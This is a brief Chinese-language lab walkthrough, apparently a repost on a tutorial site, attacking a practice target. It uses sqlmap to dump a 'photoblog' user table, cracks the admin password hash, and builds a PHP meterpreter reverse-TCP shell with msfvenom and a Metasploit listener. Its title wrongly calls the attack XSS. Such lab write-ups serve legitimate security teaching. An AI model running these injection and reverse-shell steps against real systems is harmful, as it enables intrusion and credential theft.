XSS跨站脚本

跟風遠走 提交于 2019-12-05 21:57:17
靶机地址:192.168.43.156
攻击机地址:192.168.43.89
一、AppScan检查靶机sql漏洞
二、使用sqlmap利用SQL注入漏洞
1.sqlmap -u " http://192.168.43.156/cat.php?id=1" –dbs 查看数据库名
2.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" --tables 表名
3.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" --columns 查看字段
4.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" -C "login" --dump
用同种方法查找密码
三、建立反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw
在桌面建一个文件shell.php
四、登录后台页面
刚在数据库拿到的用户名:admin
密码需要用MD5解密为:P4ssw0rd
 
在kali系统内
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在页面运行shell就可以就如靶机
 
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!